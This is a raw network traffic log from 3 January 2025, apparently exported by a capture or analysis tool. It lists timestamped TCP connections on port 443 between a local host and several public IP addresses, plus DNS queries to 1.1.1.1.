                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:08.554866076 CET44349927188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:08.642178059 CET49936443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:08.642211914 CET44349936188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:08.642393112 CET49936443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:08.642674923 CET49936443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:08.642684937 CET44349936188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:09.105104923 CET44349936188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:09.105182886 CET49936443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:09.110929966 CET49936443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:09.110940933 CET44349936188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:09.111176968 CET44349936188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:09.111819029 CET49936443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:09.111952066 CET49936443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:09.112000942 CET44349936188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:09.112101078 CET49936443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:09.112123966 CET44349936188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:09.112279892 CET49936443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:09.112313032 CET44349936188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:09.112473965 CET49936443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:09.112488031 CET44349936188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:09.732657909 CET44349936188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:09.732716084 CET44349936188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:09.732789993 CET49936443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:09.732861042 CET49936443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:09.732876062 CET44349936188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:09.732894897 CET49936443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:09.732899904 CET44349936188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:09.739336014 CET49942443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:09.739361048 CET44349942188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:09.739512920 CET49942443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:09.739784956 CET49942443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:09.739799976 CET44349942188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:10.233834028 CET44349942188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:10.233901978 CET49942443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:10.235621929 CET49942443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:10.235634089 CET44349942188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:10.235861063 CET44349942188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:10.237327099 CET49942443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:10.237366915 CET49942443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:10.237386942 CET44349942188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:10.545496941 CET44349942188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:10.545562029 CET44349942188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:10.545692921 CET49942443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:10.545725107 CET44349942188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:10.545741081 CET49942443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:10.545747042 CET44349942188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:19.702634096 CET50008443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:19.702682018 CET44350008172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:19.702847958 CET50008443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:19.703078985 CET50009443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:19.703119993 CET44350009172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:19.703206062 CET50009443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:19.703907967 CET50009443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:19.703922033 CET44350009172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:19.704180956 CET50008443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:19.704190016 CET44350008172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:20.176338911 CET44350008172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:20.180829048 CET44350009172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:20.230669975 CET50009443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:20.230670929 CET50008443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:20.286637068 CET50008443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:20.286659956 CET44350008172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:20.287199020 CET44350008172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:20.288485050 CET50009443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:20.288508892 CET44350009172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:20.289190054 CET44350009172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:20.300530910 CET50008443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:20.300661087 CET44350008172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:20.300776958 CET50009443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:20.300894976 CET44350009172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:20.355654955 CET50008443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:20.355659008 CET50009443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.249497890 CET50021443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.249528885 CET44350021162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.249583960 CET50021443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.249773026 CET50022443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.249800920 CET44350022162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.249917984 CET50021443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.249929905 CET44350021162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.249953032 CET50022443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.250080109 CET50022443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.250096083 CET44350022162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.718111038 CET44350021162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.718461037 CET50021443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.718482971 CET44350021162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.718758106 CET44350021162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.719244957 CET50021443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.719301939 CET44350021162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.724256992 CET44350022162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.724524975 CET50022443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.724548101 CET44350022162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.724838972 CET44350022162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.725188971 CET50022443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.725244045 CET44350022162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.761912107 CET50021443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.777529001 CET50022443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:35.083801985 CET44350008172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:35.083872080 CET44350008172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:35.084033012 CET50008443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:35.085155964 CET44350009172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:35.085223913 CET44350009172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:35.085325956 CET50009443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:36.626791954 CET44350021162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:36.626867056 CET44350021162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:36.626924992 CET50021443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:36.630985022 CET44350022162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:36.631062031 CET44350022162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:36.631263018 CET50022443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:34:01.447932005 CET50021443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:34:01.447967052 CET44350021162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:34:01.448364019 CET50022443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:34:01.448390007 CET44350022162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:34:20.090145111 CET50008443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:34:20.090150118 CET50009443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:34:20.090164900 CET44350008172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:34:20.090177059 CET44350009172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:16.816945076 CET138138192.168.2.4192.168.2.255
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:28.188838005 CET4959053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:28.202415943 CET53495901.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:38.762113094 CET5718953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:38.764544964 CET6485653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:38.771918058 CET53648561.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:40.151782990 CET5085653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:40.151932955 CET6462353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:40.460496902 CET6127653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:40.460736990 CET6100853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:40.467789888 CET53612761.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:40.469868898 CET53610081.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:41.141738892 CET5846553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:41.141886950 CET5799353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:41.148499966 CET53579931.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:41.148585081 CET53584651.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:41.149406910 CET5683053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:41.149544954 CET5981453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:41.157380104 CET5444053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:41.157553911 CET5355853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:41.167038918 CET5159453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:41.167182922 CET6083253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:41.168277979 CET53598141.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:41.173918009 CET53608321.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:42.803713083 CET5158353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:42.803865910 CET6314653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:42.805295944 CET5253853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:42.805485964 CET5239753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:42.810317039 CET53631461.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:42.810610056 CET53515831.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:42.811873913 CET53525381.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:42.812210083 CET53523971.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:42.884852886 CET6456753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:42.885261059 CET5983953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:42.891494036 CET53645671.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:42.891773939 CET53598391.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:43.591602087 CET58014443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:43.907615900 CET58014443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.037128925 CET44358014172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.037149906 CET44358014172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.037492037 CET44358014172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.037503004 CET44358014172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.038883924 CET58014443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.039499998 CET58014443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.039757013 CET58014443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.040997028 CET58014443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.041291952 CET58014443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.121390104 CET58014443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.121841908 CET58014443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.138216019 CET44358014172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.138345003 CET44358014172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.138354063 CET44358014172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.138367891 CET44358014172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.139202118 CET58014443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.139628887 CET58014443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.141693115 CET44358014172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.143191099 CET44358014172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.143513918 CET44358014172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.143966913 CET58014443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.145222902 CET56890443192.168.2.423.209.72.41
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.145564079 CET51194443192.168.2.423.209.72.41
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.220680952 CET44358014172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.232506990 CET44358014172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.235541105 CET44358014172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.235763073 CET58014443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.238204956 CET44358014172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.279495955 CET58014443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.451571941 CET56890443192.168.2.423.209.72.41
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.451711893 CET51194443192.168.2.423.209.72.41
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.552228928 CET58014443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.552544117 CET58014443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.596494913 CET4435689023.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.597510099 CET4435689023.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.597522020 CET4435689023.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.597533941 CET4435689023.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.597544909 CET4435689023.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.598803043 CET56890443192.168.2.423.209.72.41
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.600039959 CET56890443192.168.2.423.209.72.41
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.600995064 CET56890443192.168.2.423.209.72.41
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.601114035 CET56890443192.168.2.423.209.72.41
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.601413965 CET56890443192.168.2.423.209.72.41
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.601584911 CET56890443192.168.2.423.209.72.41
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.601610899 CET56890443192.168.2.423.209.72.41
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.605436087 CET4435119423.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.607047081 CET4435119423.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.607057095 CET4435119423.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.607068062 CET4435119423.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.607079029 CET4435119423.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.607347965 CET51194443192.168.2.423.209.72.41
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.607851982 CET51194443192.168.2.423.209.72.41
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.651710987 CET44358014172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.653410912 CET44358014172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.654557943 CET44358014172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.670922041 CET58014443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.696331024 CET4435689023.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.696464062 CET4435689023.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.696471930 CET4435689023.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.696480989 CET4435689023.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.696494102 CET4435689023.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.696609974 CET4435689023.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.699167013 CET56890443192.168.2.423.209.72.41
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.699409962 CET56890443192.168.2.423.209.72.41
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.701395035 CET4435689023.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.701430082 CET4435689023.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.702083111 CET4435119423.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.702214003 CET4435119423.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.702260971 CET4435119423.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.702271938 CET4435119423.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.702280045 CET4435119423.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.706227064 CET51194443192.168.2.423.209.72.41
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.706324100 CET51194443192.168.2.423.209.72.41
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.706650019 CET56890443192.168.2.423.209.72.41
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.725996017 CET4435689023.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.734342098 CET51194443192.168.2.423.209.72.41
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.735527039 CET56890443192.168.2.423.209.72.41
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.747971058 CET4435689023.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.747982025 CET4435689023.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.747992992 CET4435689023.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.748003960 CET4435689023.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.748258114 CET56890443192.168.2.423.209.72.41
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.748339891 CET56890443192.168.2.423.209.72.41
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.749516010 CET4435689023.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.749995947 CET56890443192.168.2.423.209.72.41
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.752825975 CET4435689023.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.755067110 CET4435689023.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.755224943 CET56890443192.168.2.423.209.72.41
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.758070946 CET4435689023.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.760268927 CET4435689023.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.760416985 CET56890443192.168.2.423.209.72.41
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.762371063 CET4435689023.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.766112089 CET4435689023.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.766491890 CET56890443192.168.2.423.209.72.41
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.767791986 CET4435689023.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.770123959 CET4435689023.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.770273924 CET56890443192.168.2.423.209.72.41
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.773430109 CET4435689023.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.775664091 CET4435689023.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.775830030 CET56890443192.168.2.423.209.72.41
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.777823925 CET4435689023.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.781140089 CET4435689023.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.781291008 CET56890443192.168.2.423.209.72.41
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.784089088 CET4435689023.209.72.41192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:44.790378094 CET4435689023.209.72.41192.168.2.4
